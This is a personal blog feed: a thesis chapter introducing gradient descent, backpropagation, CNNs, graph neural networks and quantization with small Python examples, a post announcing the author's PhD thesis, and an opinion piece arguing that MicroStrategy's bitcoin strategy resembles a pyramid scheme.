<p>where \(\alpha \) controls the size of the step in this direction and is known as the learning rate. This method proceeds in <em>epochs</em>. An epoch consists of using the entire training dataset to update each parameter. This iterative optimization algorithm is known as <em>gradient descent</em>.</p>

<p>Depending on the size of the dataset, one epoch could be too time-consuming for the purposes of developing an ML model. In that case, a family of methods known as Stochastic Gradient Descent (SGD) can be used. For example, instead of using the entire dataset for the parameter updates above, we can sample a <em>mini-batch</em> of data drawn uniformly from the training set. The convergence to a local minimum is thus noisier but significantly faster. At the same time, the noise introduced by this method can help the optimizer avoid non-optimal local minima during training.</p>
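<p>The update rule and the mini-batch idea can be sketched for a one-dimensional linear regression fitted with the MSE loss. The synthetic data, learning rate, and batch size below are illustrative assumptions:</p>

```python
import numpy as np

rng = np.random.default_rng(42)

# Synthetic data: y = 3x + 1 plus a little noise (illustrative values).
X = rng.uniform(-1, 1, size=500)
Y = 3.0 * X + 1.0 + 0.1 * rng.normal(size=500)

w, b = 0.0, 0.0     # parameters theta
alpha = 0.1         # learning rate
batch_size = 32

for epoch in range(200):
    idx = rng.permutation(len(X))
    for start in range(0, len(X), batch_size):
        j = idx[start:start + batch_size]  # mini-batch drawn from the training set
        err = (w * X[j] + b) - Y[j]
        # Gradients of the (half) MSE loss on this mini-batch.
        w -= alpha * np.mean(err * X[j])
        b -= alpha * np.mean(err)

print(w, b)  # approximately 3 and 1
```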

<p>The process for two learnable parameters is visualized in Fig. 7. Different trajectories can lead to different local minima, potentially resulting in qualitatively distinct outcomes. This problem can be mitigated using optimized versions of these algorithms, with, for example, a variable learning rate. A frequently used example is the Adam optimizer <a href="https://doi.org/10.48550/arXiv.1412.6980">[Ref]</a>. It combines an adaptive learning rate with momentum, which accumulates a moving average of past gradients to sustain optimization in consistent directions, thereby reducing the risk of stalling in small local minima or flat regions (plateaus) of the loss landscape. In this way, convergence is accelerated and robustness is improved across a wide range of tasks.</p>

<p><img src="/assets/ml-gnn-intro/sgd.png" alt="sgd" /></p>

<p><strong>Figure 7:</strong> Illustration of gradient descent in a two-dimensional parameter space. Different trajectories may lead to different local minima, and hence may give qualitatively different results. Figure from <a href="http://offconvex.github.io/2018/11/07/optimization-beyond-landscape/">[Ref]</a>.</p>

<p>The next question that arises is the following. Since the neural network is essentially a complex nested function built from these combinations of nonlinear activations and affine transformations, the loss function inherits a similarly nested structure. How, then, do we know how to update the individual parameters of each layer of the neural network in order to minimize this objective function?</p>

<h4 id="backpropagation">Backpropagation</h4>

<p>When we use a feedforward neural network that accepts an input \(\mathbf{x} \) and produces an output \(\mathbf{y} \), information flows “forward” through the network, as in from left to right in Fig. 4. The input vector \(\mathbf{x} \) provides the initial information that propagates, layer by layer, and finally results in \(\mathbf{y} \). This vector \(\mathbf{y} \) is a function of all the weights and biases of all the layers of the neural network, denoted collectively as \(\boldsymbol{\theta} \). This process is known as forward propagation. A scalar cost function \(J(\boldsymbol{\theta}) \) can then be formed using the output \(\mathbf{y} \).</p>

<p>The backpropagation algorithm is the reverse process, where the information from the cost \(J(\boldsymbol{\theta}) \) flows “backward”, i.e., from right to left in Fig. 4, through the network in order to compute the gradients needed for the parameter updates. Essentially, it is an efficient application of the chain rule to neural networks. Backpropagation computes the gradient of a loss function with respect to the parameters of the network for a single input-output example by applying the chain rule layer by layer in reverse order. This backward iteration avoids redundant calculations of intermediate derivatives and is related to dynamic programming, as it reuses intermediate results in order to improve efficiency <a href="https://www.deeplearningbook.org">[Ref]</a>.</p>

<p>Strictly speaking, the term backpropagation refers only to the algorithm used for this computation and does not include how the computed gradients are used. The term, however, is often used loosely to refer to the entire learning algorithm, including the parameter updates we saw earlier.</p>
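<p>To make the chain rule mechanics concrete, here is a sketch of one forward and one backward pass for a tiny one-hidden-layer network with a squared-error loss. The sizes, the ReLU activation, and the final finite-difference check are illustrative assumptions:</p>

```python
import numpy as np

rng = np.random.default_rng(0)
x = rng.normal(size=3)                        # input
t = 0.5                                       # target
W, b = rng.normal(size=(4, 3)), np.zeros(4)   # hidden layer parameters
v, c = rng.normal(size=4), 0.0                # output layer parameters

# Forward propagation: store intermediates needed by the backward pass.
z = W @ x + b
h = np.maximum(0.0, z)                 # ReLU hidden activations
y = v @ h + c                          # scalar output
J = 0.5 * (y - t) ** 2                 # squared-error cost

# Backward propagation: chain rule applied layer by layer, in reverse.
dy = y - t                             # dJ/dy
dv, dc = dy * h, dy                    # gradients of the output layer
dh = dy * v                            # dJ/dh
dz = dh * (z > 0)                      # through the ReLU
dW, db = np.outer(dz, x), dz           # gradients of the hidden layer

# Sanity check of dJ/dc against a finite difference.
eps = 1e-6
J_eps = 0.5 * ((v @ h + c + eps) - t) ** 2
assert abs((J_eps - J) / eps - dc) < 1e-4
```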

<h2 id="convolutional-neural-networks">Convolutional Neural Networks</h2>

<p>Convolutional neural networks are a special kind of deep learning model, especially suited to image data. When the training data are images, the input is high-dimensional. Even for a low-resolution image of 256 by 256, the input would have to be of size \(256 \times 256 = 65\,536 \). At this size, using a fully connected feedforward neural network to process the input becomes problematic. In addition, by treating the pixels essentially as a vector, we lose information about the “local structure” of the image. Apart from the value of each pixel itself, there is a significant amount of information in the placement of the pixels relative to each other. Going back to our earlier example, even after changing the pixel colors, one could still understand whether a photo depicts a grass field or not. The texture of the grass is encoded in how the relative values of neighboring pixels are arranged to form the edges corresponding to the grass blades, and the patterns in general, which together convey the texture and structure typical of a grass field.</p>

<p>In order to capture this local structure of the image, the idea is, instead of flattening the input into a vector, to process it in its original, matrix-like form. To make this easier, we can split the image into small square patches of equal size. Each patch can then be processed to extract meaningful local features. In practice, this is done using shared filters, also known as kernels, that learn to detect patterns relevant to the task. How is this actually done?</p>

<p>In order to preserve the local structure, we organize the learnable parameters of the model in a matrix \(\mathbf{F} \), for “filter”, of size equal to the size of the patches. We then perform the <em>convolution</em> of the filter matrix \(\mathbf{F} \) across the original image using a moving window approach, as illustrated in Fig. 8. The pixels of each patch are multiplied element-wise with the filter and summed into a scalar, and then the bias is added. The output of this operation is sometimes referred to as the feature map. Like before, a nonlinearity is applied to the output, typically the ReLU activation. The learnable parameters of this algorithm are the values of the matrix “filter” as well as the value of the “bias”.</p>

<p><img src="/assets/ml-gnn-intro/conv.png" alt="conv" /></p>

<p><strong>Figure 8:</strong> Illustration of the process of convolving a filter across an image using a sliding window approach. Inspired by <a href="https://themlbook.com">[Ref]</a>.</p>
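<p>A direct (and deliberately unoptimized) sketch of the sliding-window convolution of Fig. 8, with stride 1 and no padding; the example image and filter values are illustrative assumptions:</p>

```python
import numpy as np

def conv2d(image, F, bias=0.0):
    """Slide the filter F over the image; each patch is multiplied
    element-wise with F and summed into a scalar, then the bias is added."""
    H, W = image.shape
    k = F.shape[0]
    out = np.zeros((H - k + 1, W - k + 1))
    for i in range(out.shape[0]):
        for j in range(out.shape[1]):
            patch = image[i:i + k, j:j + k]
            out[i, j] = np.sum(patch * F) + bias
    return out

image = np.arange(16.0).reshape(4, 4)   # a toy 4x4 "image"
F = np.ones((2, 2)) / 4.0               # a simple 2x2 averaging filter
fmap = conv2d(image, F)                 # the resulting feature map
print(fmap.shape)  # (3, 3)
```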

<p>This operation is performed for a number \(k \) of filters, in order to extract various features in the image, and each filter’s parameters are completely independent. The output for each filter is different, and hence the operation of this convolutional layer results in a collection of \(k \) feature maps. This collection can be thought of as a higher-dimensional tensor and is called a volume. For color images, the input is actually also a volume, since the image is usually represented by three channels: R (red), G (green), and B (blue), where each channel is a monochrome picture.</p>

<p>In a convolutional layer with a multi-channel input volume, the operation is similar to the single-channel case. The convolution of a patch from a multi-channel volume is equal to the sum of the convolutions of the corresponding patches from each individual channel.</p>

<p>By applying various convolutional layers in sequence, the model can learn hierarchical representations of data, starting from low-level representations such as edges in images, all the way to high-level features such as faces and objects.</p>

<p>Another operation frequently used in CNNs is <em>pooling</em>. It works in a similar way to the convolution, as a filter is applied using a sliding window approach. However, instead of applying a trainable filter, a fixed operation is applied: commonly max pooling (which selects the maximum value) or average pooling (which computes the mean value) within each window. Pooling is used to reduce the spatial dimensions of feature maps, helping to retain the most significant features from the input. This subsampling process lowers the number of parameters, decreases computation time, and helps prevent overfitting, ultimately improving model performance.</p>
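<p>Max pooling can be sketched in a few lines; the example below uses non-overlapping \(2 \times 2 \) windows on a toy feature map (illustrative values):</p>

```python
import numpy as np

def max_pool(fmap, size=2):
    """Non-overlapping max pooling with a size x size window."""
    H, W = fmap.shape
    trimmed = fmap[:H - H % size, :W - W % size]  # drop ragged edges, if any
    blocks = trimmed.reshape(H // size, size, W // size, size)
    return blocks.max(axis=(1, 3))                # max within each window

fmap = np.array([[1., 2., 5., 6.],
                 [3., 4., 7., 8.],
                 [9., 2., 1., 0.],
                 [5., 6., 3., 4.]])
print(max_pool(fmap))
# [[4. 8.]
#  [9. 4.]]
```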

<p>A famous and illustrative example of the CNN architecture is shown in Fig. 9. The LeNet-5 architecture <a href="https://doi.org/10.1109/5.726791">[Ref]</a>, designed for digits recognition, is split into two modules: the feature extraction module and the trainable classifier module. For the former, a convolutional layer is combined with a subsampling layer twice, C1-S2 and C3-S4, and then layer C5 creates 120 feature maps of size \(1\times 1 \). These feature maps are then “flattened” into a 1-dimensional vector of size 120. For the classification part, this vector is then fed into the feedforward fully connected layers.</p>

<p><img src="/assets/ml-gnn-intro/lenet.png" alt="lenet" /></p>

<p><strong>Figure 9:</strong> The architecture of LeNet-5, a convolutional neural network for digits recognition, as depicted in the original paper <a href="https://doi.org/10.1109/5.726791">[Ref]</a>. The feature extraction module is illustrated using convolution and pooling operations. The classification is performed in the fully connected layers. The input is images of size \(32 \times 32 \). Layer C1 has 6 feature maps of size \(28 \times 28 \), while layer C3 has 16 feature maps of size \(10\times10 \). After subsampling, layers S2 and S4 reduce the size of the maps by one half. The output is then fed into the fully connected network of layers with 120 and 84 units. Finally, the output of the network is a vector of dimension 10.</p>

<h2 id="graph-neural-networks">Graph Neural Networks</h2>

<p>What happens when the data that we have are not structured in the traditional tabular manner, such as vectors in the case of series, or matrices in the case of images? Furthermore, what happens when our data possess an inherent network structure which we would like to take into account, or even learn about directly?</p>

<p>Networks are ubiquitous—and so are graphs. In many real-world scenarios, it is beneficial to think of data points not in isolation but as part of a web of complex connections: people connected through social interactions, proteins by biochemical interactions, or web pages by hyperlinks. Capturing and using this connectivity is crucial for understanding the underlying relationships and dynamics <a href="https://ieeexplore.ieee.org/book/9205745">[Ref]</a>.</p>

<p>Similarly to images being processed by CNNs, we would like to have an algorithm that can take these complex network structures as input. These structures are known as graphs. In general, a graph is a pair \(G = (V, E) \), where \(V \) is a finite set of vertices (or nodes), and \(E \) is the set of connections (known as edges) between these nodes. Graphs can be further classified into directed and undirected. The former means that the edges have a certain direction; for example, we can go from node 5 to node 6, but not the other way around, as illustrated in Fig. 10. The latter means that the connections are symmetrical and mutual, as illustrated in Fig. 11. In addition, in Fig. 11, we can see that the graph comprises two so-called connected components, i.e., maximally connected subgraphs which are disconnected from each other.</p>

<p><img src="/assets/ml-gnn-intro/graph-dir.png" alt="graph-dir" /></p>

<p><strong>Figure 10:</strong> A directed graph with eight vertices and seven edges.</p>

<p><img src="/assets/ml-gnn-intro/graph.png" alt="graph" /></p>

<p><strong>Figure 11:</strong> An undirected graph with eight vertices and seven edges, and two connected components.</p>

<p>Graphs can be represented in various ways. A frequently used representation is the so-called <em>adjacency matrix</em>. The elements of the adjacency matrix \(\mathbf{A} \) are given simply by \( \mathbf{A}_ {ij} = 1 \), if there is a link from node \(i \) to node \(j \), and \( \mathbf{A}_ {ij} = 0 \), otherwise.</p>

<p>The adjacency matrix \(\mathbf{A} \) is therefore symmetric for undirected graphs but not necessarily symmetric for directed ones. Furthermore, the edges themselves may carry a value based on some characteristic of the connection, instead of simply 0 and 1. In this case, the graph is called weighted. Finally, the information associated with the nodes is referred to as <em>node features</em>, while the information associated with the edges is known as <em>edge features</em>.</p>
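<p>Building the adjacency matrix from an edge list is straightforward; a sketch for a small, hypothetical undirected graph:</p>

```python
import numpy as np

# Hypothetical undirected graph: 4 nodes, edges (0,1), (1,2), (0,3).
n = 4
edges = [(0, 1), (1, 2), (0, 3)]

A = np.zeros((n, n), dtype=int)
for i, j in edges:
    A[i, j] = 1
    A[j, i] = 1   # mirror the entry: undirected graphs give a symmetric A

print(A)
# [[0 1 0 1]
#  [1 0 1 0]
#  [0 1 0 0]
#  [1 0 0 0]]
```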

<p>The question now is the following: How do we take advantage of the relational structure of graphs, in order to achieve better predictions? Drawing inspiration from CNNs, where we wanted to capture the local structure of the pixels in the images, we will try to do something similar. The idea is to do a series of “convolutions”, similar to the ones for images, but this time suited for data with a network structure.</p>

<h3 id="node-embeddings">Node Embeddings</h3>

<p>In deep learning, we wanted to avoid hand-designing the representations of the problem and instead learn them, in a process that we called representation learning. In the same vein, we will do the same for our graphs. We will learn node representations, which we will call node embeddings, that contain information about each node and its connections to neighboring nodes. In this mapping, which can be learned using a neural network, similar nodes in the network are embedded close to each other.</p>

<h3 id="message-passing">Message Passing</h3>

<p>In order to capture the connectivity of the network and encode it inside the node embeddings, the process, for each node in the graph, is as follows <a href="https://doi.org/10.1109/TNN.2008.2005605">[Ref]</a>.</p>

<ol>
  <li>The embeddings of neighboring nodes are aggregated using a permutation invariant function. This is justified because a permutation of the graph nodes should not give a different result. Examples of these aggregating functions include the max, sum or average functions. This process is referred to as the aggregation of the <em>messages</em> received from the immediate neighbors.</li>
  <li>This aggregated information is then passed through a neural network.</li>
  <li>Finally, the node embedding of the target node is updated based on the aggregated messages from its neighbors. This iterative process of updating the node representations by exchanging information between neighbors is known as <em>message passing</em>.</li>
</ol>

<p>In this way, after each message passing step, the receptive field of the GNN increases by one hop. A hop, here, refers to a traversal from one node of a graph to a neighboring node via a connecting edge. The process is summarized in Fig. 12.</p>

<p><img src="/assets/ml-gnn-intro/aggregate.png" alt="aggregate" /></p>

<p><strong>Figure 12:</strong> Illustration of the process of message passing. Every node defines its own computation graph based on its neighborhood. Left: The input graph and the target node based on which the series of computations is defined. Right: The message passing steps for two hops away from the target node. Gray rectangles represent neural networks. Figure from <a href="https://web.stanford.edu/class/cs224w/">[Ref]</a>.</p>

<p>For a graph \(G = (V,E) \), the message passing layer can also be expressed as:</p>

<p>\[
    \mathbf{h}_ u = \phi \left( \mathbf{x}_ u, \bigoplus_ {v \in \text{Adj}[u]} \psi (\mathbf{x}_ u, \mathbf{x}_ v,\mathbf{e}_ {uv}) \right) \,,
\]</p>

<p>where \(\phi \) and \(\psi \) are differentiable functions representing neural networks, \(\text{Adj}[u] \) is the immediate neighborhood of node \(u \in V \), \(\mathbf{x}_ u \) represents the node features of node \(u \in V \), and \(\mathbf{e}_ {uv} \) represents the edge features of edge \((u,v) \in E \). Finally, \(\bigoplus \) is a permutation invariant aggregation operator (e.g., element-wise sum, mean) accepting an arbitrary number of inputs. Functions \(\phi \) and \(\psi \) are referred to as the update and message functions, respectively.</p>
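<p>A minimal sketch of one such message passing layer, with the sum as the aggregation operator \(\bigoplus \). Real GNNs use neural networks for \(\phi \) and \(\psi \); here they are replaced by toy stand-in functions, and the graph, features, and functions are all illustrative assumptions (edge features are omitted for brevity):</p>

```python
import numpy as np

def message_passing(X, edges, phi, psi):
    """One step: h_u = phi(x_u, sum over v in Adj[u] of psi(x_u, x_v))."""
    n = X.shape[0]
    agg = [np.zeros_like(X[0]) for _ in range(n)]
    for u, v in edges:                  # undirected: messages flow both ways
        agg[u] = agg[u] + psi(X[u], X[v])
        agg[v] = agg[v] + psi(X[v], X[u])
    return np.stack([phi(X[u], agg[u]) for u in range(n)])

# Toy stand-ins for the message and update networks psi and phi.
psi = lambda x_u, x_v: x_v              # message: the neighbor's features
phi = lambda x_u, m: x_u + m            # update: add the aggregated messages

X = np.array([[1.0], [2.0], [3.0]])     # node features, one per node
edges = [(0, 1), (1, 2)]                # a path graph 0 - 1 - 2
H = message_passing(X, edges, phi, psi)
print(H.ravel())  # [3. 6. 5.]: node 1 hears from both neighbors
```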

<p>Other “flavors” of this message passing process have been developed, such as the famous graph convolution networks <a href="https://arxiv.org/abs/1609.02907v4">[Ref]</a> and interaction networks <a href="https://doi.org/10.48550/arXiv.1612.00222">[Ref]</a>.</p>

<p>Having presented these ML models, we now move on to an important technique used in the field of ML/DL: quantization.</p>

<h2 id="quantization">Quantization</h2>

<p>Quantization, in signal processing in general, is the process of mapping values from a continuous set to a finite set. Examples of this include rounding and truncation. In this form, quantization is involved to some extent in nearly all digital signal processing, because the continuous analog signal of any quantity has to be digitized into discrete values.</p>

<p>In the context of ML/DL <a href="https://huggingface.co/docs/optimum/en/concept_guides/quantization">[Ref]</a>, quantization refers to the process of reducing the size of models by representing their weights and activations using numbers with fewer bits than standard floating-point formats, where 32 or 64 bits are typical. In this way, the computational and memory costs of inference can be reduced significantly. On the one hand, the required memory is reduced simply because each weight occupies less space. On the other hand, the operations happen between low-precision data types and hence are considerably less computationally expensive.</p>

<p>As a simple example, let’s consider a symmetric quantization scheme, from 32-bit float to 8-bit integer precision. With 8 bits, only \(2^8 = 256 \) numbers can be represented, while using 32-bit floats, a wide range of values is possible. Let’s consider a float \(x \in [-\alpha,\alpha] \), where \(\alpha \) is a real number with \(\alpha&gt;0 \). How do we best project this symmetric interval \([-\alpha,\alpha] \) of floats onto the space of 8-bit integers? We can write the following quantization scheme:</p>

<p>\[
    x = S \times x_q \,,
\]</p>

<p>where \(x_q \) is the quantized representation of float \(x \), and float \(S \) is the scale quantization parameter. The quantized value can then be calculated as follows:</p>

<p>\[
    x_q = \text{round}(x/S) \,.
\]</p>

<p>Finally, any float values outside interval \([-\alpha,\alpha] \) are clipped, so for any float \(x \):</p>

<p>\[
    x_q = \text{clip}(\text{round}(x/S), -\alpha_q, \alpha_q) \,,
\]</p>

<p>where \(\alpha_q = \text{round}(\alpha/S) \), and \(\text{clip}(x, x_{\text{min}}, x_{\text{max}}) \) denotes the clamp (or clipping) function between \(x_{\text{min}} \) and \(x_{\text{max}} \).</p>
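<p>The scheme above can be sketched end to end for INT8; the input values and the choice \(\alpha = 5 \) below are illustrative assumptions:</p>

```python
import numpy as np

def quantize(x, alpha):
    """Symmetric quantization of floats in [-alpha, alpha] to int8."""
    S = alpha / 127.0                      # scale: alpha maps to the largest code
    alpha_q = np.round(alpha / S)          # = 127
    x_q = np.clip(np.round(x / S), -alpha_q, alpha_q)
    return x_q.astype(np.int8), S

def dequantize(x_q, S):
    return S * x_q                         # x is approximately S * x_q

x = np.array([-3.0, 0.1, 2.5, 7.0])
x_q, S = quantize(x, alpha=5.0)            # 7.0 lies outside [-5, 5]: clipped
print(x_q)                                 # int8 codes; the last one is 127
print(dequantize(x_q, S))                  # approximate reconstruction
```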

<h3 id="calibration-and-quantization-types">Calibration and Quantization Types</h3>

<p>Calibration is the process during which the ideal values for the quantization parameters, the scale \(S \) in our example, are chosen based on the distribution of the input values. For example, as shown in Fig. 13, based on the range of the input values, the interval limits \([-\alpha,\alpha] \) are chosen, and the value of \(S \) is chosen such that \(\alpha \) is mapped to the highest value the quantized type can take. For the values shown, and according to the equations above, the scale will have to be \(S = 10.8 / 127 \). Because the interval is symmetric, of the 256 values available in INT8 we effectively use only half to represent positive values, while the rest are reserved for the zero point and the negative values.</p>

<p><img src="/assets/ml-gnn-intro/quant.png" alt="quant" /></p>

<p><strong>Figure 13:</strong> Illustration of the process of symmetric quantization. The scale is chosen to best fit the input values to be quantized. Figure from <a href="https://newsletter.maartengrootendorst.com/p/a-visual-guide-to-quantization">[Ref]</a>.</p>
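<p>A minimal sketch of this calibration step, choosing \(\alpha \) as the largest absolute observed value; the sample values are illustrative assumptions, chosen so that the scale matches the \(10.8/127 \) of the example above:</p>

```python
import numpy as np

# Hypothetical sample of values observed during calibration.
values = np.array([-10.8, -4.2, 0.0, 3.3, 7.1])

alpha = np.max(np.abs(values))  # symmetric range [-alpha, alpha]
S = alpha / 127.0               # alpha is mapped to the largest INT8 value
print(S)                        # 10.8 / 127
```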

<p>For the case of neural networks, the input values of the quantization are the weights and the activations of the model. For weights, the process is quite easy since the actual range can be easily calculated at the time of quantization. For activations, however, things are a bit more complicated, and the approaches are different depending on the type of quantization pursued:</p>

<ul>
  <li><strong>Post-Training Quantization (PTQ):</strong> The quantization of the weights and activations is performed after the training of the model in full precision.</li>
  <li><strong>Quantization-Aware Training (QAT):</strong> The quantization is performed during the training process.</li>
</ul>

<p>Depending on the type of quantization, a different method for the calibration of the activations is used <a href="https://huggingface.co/docs/optimum/en/concept_guides/quantization">[Ref]</a>:</p>

<ul>
  <li>Static PTQ: At the time of quantization, a representative sample of the data is passed through the model and the activation values are recorded, using “observers” placed at the activations. After several forward passes, the ranges of the computations can be deduced using some calibration technique.</li>
  <li>Dynamic PTQ: For each activation, the range is computed at runtime. However, this can prove slow, and may not even be an option on some types of hardware.</li>
  <li>QAT: The ranges of computations are computed during training. “Fake quantize” operators simulate the effects of quantization during training, enabling the model to adjust and become robust to the errors introduced by the quantization process.</li>
</ul>

<h2 id="conclusion">Conclusion</h2>

<p>In this article, I presented a brief history of machine learning, and sketched, from the ground up, the inner workings of graph neural networks. Quantization was also introduced.</p>

<p>This article is one of the chapters of my PhD thesis titled: <strong>“Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures”</strong>. The full text can be found here: <a href="/news/phd-thesis/">PhD Thesis</a>. In the main results part of this work, GNNs were used to perform the task of track reconstruction, in the context of the Large Hadron Collider at CERN.</p>]]></content><author><name> </name></author><category term="Blog" /><category term="Machine Learning" /><category term="Graph Neural Networks" /><category term="Deep Learning" /><summary type="html"><![CDATA[Brief introduction to graph neural networks, starting from machine learning, and sketching, from the ground up, the inner workings of graph neural networks.]]></summary></entry><entry><title type="html">PhD Thesis Now Online</title><link href="https://fotisgiasemis.com/news/phd-thesis/" rel="alternate" type="text/html" title="PhD Thesis Now Online" /><published>2025-08-12T00:00:00+02:00</published><updated>2025-08-12T00:00:00+02:00</updated><id>https://fotisgiasemis.com/news/phd-thesis</id><content type="html" xml:base="https://fotisgiasemis.com/news/phd-thesis/"><![CDATA[<p>I’m happy to share that the pre-defense version of my PhD thesis is now publicly available on <a href="https://doi.org/10.48550/arXiv.2508.07423">arXiv</a>!</p>

<p>The thesis</p>

<blockquote>
  <p><strong>Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures</strong></p>
</blockquote>

<p>explores how modern machine learning models can be deployed efficiently in high-energy physics environments, with a focus on maximizing <strong>throughput</strong> and minimizing <strong>energy</strong> consumption.</p>

<p>Here’s a peek at the table of contents:</p>

<p><a href="/assets/pdf/giasemis_phd_thesis_toc.pdf"><img src="/assets/pdf/giasemis_phd_thesis_toc.pdf" alt="toc" /></a></p>

<p>You can:</p>

<ul>
  <li>
    <p>Read more about the <strong>project</strong> here: <a href="/projects/#tracking-with-graph-neural-networks">Project</a></p>
  </li>
  <li>
    <p>Read the <strong>ML intro chapter</strong> here: <a href="/blog/ml-gnn-intro/">From Machine Learning to Graph Neural Networks and Quantization – An Introduction</a></p>
  </li>
  <li>
    <p>Read the <strong>HPC intro chapter</strong> here: <a href="/blog/hpc-gpu-fpga-intro/">From GPUs to FPGAs – An Introduction to High-Performance Computing</a></p>
  </li>
  <li>
    <p>Read the <strong>Physics intro</strong> chapter here: <a href="/blog/accelerator-heavy-flavor-physics">Accelerator and Heavy Flavor Physics – Introductory Concepts</a></p>
  </li>
  <li>
    <p>Read the <strong>full thesis</strong> here: <a href="https://doi.org/10.48550/arXiv.2508.07423">arXiv.2508.07423</a></p>
  </li>
  <li>
    <p>The <strong>PhD defense</strong> is <a href="/news/thesis-defense-scheduled">scheduled for the 5th of September, 2025</a> and you can find the page of the defense (viva) <a href="https://indico.in2p3.fr/e/fotis-giasemis-phd-defense">here</a>.</p>
  </li>
</ul>

<p>If you have any thoughts, questions, or feedback, feel free to reach out.</p>

<p><img src="/assets/images/front.png" alt="front" style="width:65%;" /></p>]]></content><author><name> </name></author><category term="News" /><category term="CERN" /><category term="PhD" /><category term="Machine Learning" /><category term="GPU" /><category term="FPGA" /><summary type="html"><![CDATA[Thesis now online: Real-Time Analysis of Unstructured Data with Machine Learning on Heterogeneous Architectures.]]></summary></entry><entry><title type="html">Is MicroStrategy a Bitcoin Pyramid Scheme?</title><link href="https://fotisgiasemis.com/blog/is-microstrategy-a-bitcoin-pyramid-scheme/" rel="alternate" type="text/html" title="Is MicroStrategy a Bitcoin Pyramid Scheme?" /><published>2025-06-15T00:00:00+02:00</published><updated>2025-06-15T00:00:00+02:00</updated><id>https://fotisgiasemis.com/blog/is-microstrategy-a-bitcoin-pyramid-scheme</id><content type="html" xml:base="https://fotisgiasemis.com/blog/is-microstrategy-a-bitcoin-pyramid-scheme/"><![CDATA[<p><a href="https://en.wikipedia.org/wiki/MicroStrategy">MicroStrategy Inc.</a> (ticker <code class="language-plaintext highlighter-rouge">MSTR</code>), recently renamed <a href="https://www.strategysoftware.com/">Strategy</a>, was founded in 1989 as a software company. Today, it presents itself as a <strong>“bitcoin treasury”</strong>—a company whose core business is essentially holding bitcoin. As of 2025, it is the <a href="https://bitbo.io/treasuries/#public">largest</a> corporate bitcoin holder in the world, owning more than 500,000 bitcoins with an estimated value of roughly <strong>$60B</strong>.</p>

<p><img src="/assets/images/mstr.png" alt="mstr" />
<em>Image generated using OpenAI’s DALL·E, June 2025.</em></p>

<p>The company is growing at a <a href="https://www.bloomberg.com/news/articles/2024-10-30/microstrategy-outgaining-nvidia-obscures-rising-concern-over-stock-premium">mind-bending rate</a>—<strong>its stock has surged by more than 2,000% since 2022</strong>, outperforming nearly every major U.S. stock, including Nvidia. How is this happening?</p>

<p>The company’s <a href="https://www.forbes.com/sites/mauriciodibartolomeo/2024/12/02/how-wall-street-powers-microstrategys-bitcoin-flywheel/">current business model</a> can be described as a <a href="https://bitwiseinvestments.eu/blog/crypto-research/is-micro-strategy-a-risk-for-bitcoin/">positive feedback loop</a>:</p>

<ul>
  <li><strong>Borrow</strong> money, primarily by issuing new stock.</li>
  <li>Use the proceeds to <strong>buy bitcoin</strong>.</li>
  <li>This increases both the company’s bitcoin holdings and (in theory) bitcoin’s price, thereby <strong>boosting the company’s market capitalization</strong>—which can then be used to raise more capital and <strong>repeat the cycle</strong>.</li>
</ul>

<p>This feedback loop has been nicknamed the <a href="https://www.bloomberg.com/opinion/articles/2024-11-22/bitcoin-surge-microstrategy-s-infinite-money-glitch-won-t-last">“infinite money glitch”</a>. But let’s be clear: it’s not sustainable. Here’s why.</p>

<h2 id="a-simple-example">A Simple Example</h2>

<p>Let’s walk through an illustrative case, as in examples shown <a href="https://youtu.be/P5LKZ1-6BWM">here</a> and <a href="https://www.youtube.com/watch?v=RIWax9-4U2k">here</a>:</p>

<p>Suppose a company owns 10 units of a fictional cryptocurrency called <strong>B Coin</strong>. Each B Coin is worth $1. The company has 1,000 shares outstanding, priced at $0.50 each. This means each share entitles its holder to:</p>

\[\frac{10}{1000} = 1\% \text{ of a B Coin}\]

<table>
  <thead>
    <tr>
      <th style="text-align: center">Assets</th>
      <th style="text-align: center">Shares Outstanding</th>
      <th style="text-align: center">Value per Share (B Coin)</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center">10 B Coins</td>
      <td style="text-align: center">1,000</td>
      <td style="text-align: center">1%</td>
    </tr>
  </tbody>
</table>

<p>Now imagine the company raises $10 by issuing 20 new shares at the current price of $0.50. It uses that $10 to buy 10 more B Coins. The new situation:</p>

<table>
  <thead>
    <tr>
      <th style="text-align: center">Assets</th>
      <th style="text-align: center">Shares Outstanding</th>
      <th style="text-align: center">Value per Share (B Coin)</th>
    </tr>
  </thead>
  <tbody>
    <tr>
      <td style="text-align: center">20 B Coins</td>
      <td style="text-align: center">1,020</td>
      <td style="text-align: center">~1.96%</td>
    </tr>
  </tbody>
</table>

<p>Suddenly, the <strong>assets per share</strong> have nearly doubled—from 1% to ~1.96% of a B Coin. That’s a <strong>96% increase</strong>. Where did this extra value come from?</p>

<p>It came from the <strong>new investors</strong>.</p>

<p>Initially, $0.50 buys half of a B Coin outright. But a latecomer who spends that $0.50 on a share of the company instead ends up with a claim on only ~1.96% of a B Coin. They drastically overpaid. This gap is precisely the premium investors pay to hold MSTR stock rather than bitcoin itself. Meanwhile, <strong>early shareholders benefited</strong> from the dilution and saw their assets-per-share value increase.</p>
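<p>As a sanity check, the dilution arithmetic above can be reproduced in a few lines of Python. The <code class="language-plaintext highlighter-rouge">bcoin_per_share</code> helper and all figures are the hypothetical B Coin numbers from the example, not real market data:</p>

```python
# A quick check of the dilution arithmetic in the B Coin example above.
# All numbers are the hypothetical figures from the example, not real MSTR data.

def bcoin_per_share(coins_held: float, shares_outstanding: int) -> float:
    """Fraction of one B Coin backing each share."""
    return coins_held / shares_outstanding

# Before the raise: 10 B Coins backing 1,000 shares.
before = bcoin_per_share(10, 1_000)            # 0.01  -> 1% of a B Coin

# Raise $10 by issuing 20 new shares at $0.50, then buy 10 more B Coins at $1.
after = bcoin_per_share(10 + 10, 1_000 + 20)   # ~0.0196 -> ~1.96% of a B Coin

# Gain in assets per share enjoyed by the pre-existing shareholders.
gain = after / before - 1                      # ~0.96 -> a ~96% increase
print(f"before: {before:.2%}, after: {after:.2%}, gain: {gain:.0%}")
```

<p>The key point the numbers make explicit: the new buyers’ $10 went entirely into B Coins, but the claim they received per dollar is far smaller than what their dollars purchased, and the difference accrues to the earlier shareholders.</p>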

<p>This process can continue as long as new buyers are willing to join in. But at some point, <strong>someone will be the last buyer</strong>, left holding overpriced shares when the music stops.</p>

<p>This mechanism bears resemblance to how <strong>pyramid schemes</strong> operate: earlier participants benefit from the contributions of newer ones.</p>

<p>A question remains:</p>

<blockquote>
  <p><strong>What will happen when the price of bitcoin eventually crashes?</strong></p>
</blockquote>

